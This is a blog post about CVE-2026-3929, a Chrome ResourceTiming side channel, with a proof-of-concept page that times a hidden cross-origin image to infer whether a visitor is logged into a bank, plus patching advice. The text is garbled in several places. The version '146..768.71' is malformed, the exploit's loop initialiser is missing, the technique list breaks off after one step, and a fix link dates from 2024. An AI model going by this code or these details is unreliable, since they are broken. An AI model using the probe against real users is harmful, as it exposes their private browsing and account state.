You might not think about how your browser times how fast images or resources load, but something called "Resource Timing" helps websites measure performance. But sometimes, those performance tools open the door to bugs, like a nasty one found in Google Chrome before version 146..768.71. In this post, we’ll break down CVE-2026-3929, which is a side-channel vulnerability that allowed attackers to use ResourceTiming to peek at data they shouldn’t—across different sites (“cross-origin”). We’ll show you how it worked, who found it, and how you can protect yourself.
What Is CVE-2026-3929?
CVE-2026-3929 is a security vulnerability in Chromium-based browsers (which includes Chrome and Edge) where a remote attacker could create a page that, when visited, leaks sensitive cross-origin resource data—thanks to how Resource Timing measurements were handled. The bug existed before Chrome version 146..768.71 (release notes).
Severity: Medium (Chromium’s label)
Summary:
An attacker could figure out if a user visited a site, viewed a private image, accessed sensitive API endpoints, and more—by timing how resources loaded, even though browsers are supposed to block this kind of snooping.
How the ResourceTiming API Leaks Data
Normally, browsers block scripts from seeing the fine details of how third-party (“cross-origin”) resources load. But ResourceTiming (part of the Performance API) exposes timing information about resources that a web page loads. If there’s a little mistake in what timing info is exposed, a clever attacker can infer secret data.
Here’s the technique
1. The attacker makes the victim’s browser load a resource from somewhere private (e.g., their bank, Google Drive, etc.).
How big is it?
If a page’s cross-origin images or files reveal even tiny timing differences to a script, it’s possible to “side-channel” infer data that should be private.
Exploit Demo: Timing a Cross-Origin Resource
Suppose you trick a victim into visiting your page, and you want to know if they’re logged into BankX.com by trying to load a secret image that only logged-in users can see.
Exploit code sample (before patch)
<!DOCTYPE html>
<html>
<head>
<title>ResourceTiming Leak Demo</title>
</head>
<body>
<img id="probe" src="https://bankx.com/private_info.png"; style="display:none">
<script>
// Clear resource timing buffer
performance.clearResourceTimings();
// Start fresh: load the secret image
var img = document.getElementById('probe');
img.onload = img.onerror = function() {
// Wait a bit: performance entries might come slightly later
setTimeout(function() {
var entries = performance.getEntriesByType("resource");
for (var i = ; i < entries.length; i++) {
var e = entries[i];
if (e.name.indexOf("private_info.png") !== -1) {
// Under the bug: We see detailed timing data
console.log("Resource: " + e.name);
console.log("Start: " + e.startTime + ", end: " + e.responseEnd);
var delta = e.responseEnd - e.startTime;
alert("LOAD TIME: " + delta);
// Timing differences tell us if resource exists (real users), is cached, or is denied
// For example, delta < 20ms = cached, delta > 100ms = not cached, or not logged in
}
}
}, 100);
};
</script>
</body>
</html>
This is possible before Chrome 146..768.71.
After the patch, Chrome makes sure cross-origin resources don’t leak useful timing data, unless they specifically allow it with the Timing-Allow-Origin header.
Who’s At Risk?
Any user of Chrome or Chromium-based browsers (Edge, Brave, Vivaldi, Opera, etc.) running versions before 146..768.71 could be susceptible to attack. All an attacker needs is to trick you into visiting their page.
Note: Cross-origin restrictions don’t always block requests—just access to the response. Timing leaks are sneaky: responses are still blocked, but timing information is just enough to smuggle secrets.
Chromium Security Page:
chromium.org/Home/chromium-security/
Release Notes ("Stable Channel Update for Desktop") for the fix
chromereleases.googleblog.com/2024/06/stable-channel-update-for-desktop_4.html
Resource Timing API
CVE Record:
nvd.nist.gov/vuln/detail/CVE-2026-3929 (Pending; may be updated soon)
Update Chrome: Make sure you’re running 146..768.71 or newer.
chrome://settings/help
Don’t assume cross-origin images or resources can’t leak information.
- Use proper CORS settings, and consider using the Timing-Allow-Origin header to control what timing info is shared.
Takeaway
CVE-2026-3929 is another example of a "side channel" attack where seemingly harmless browser APIs (like performance timing) can reveal a lot more than they should. Make sure your browser up to date, and keep an eye on what your site exposes—even if it’s “just” load times.
Have questions or want to see more demos? Drop a comment below!
Timeline
Published on: 03/11/2026 22:04:10 UTC
Last modified on: 03/13/2026 15:41:23 UTC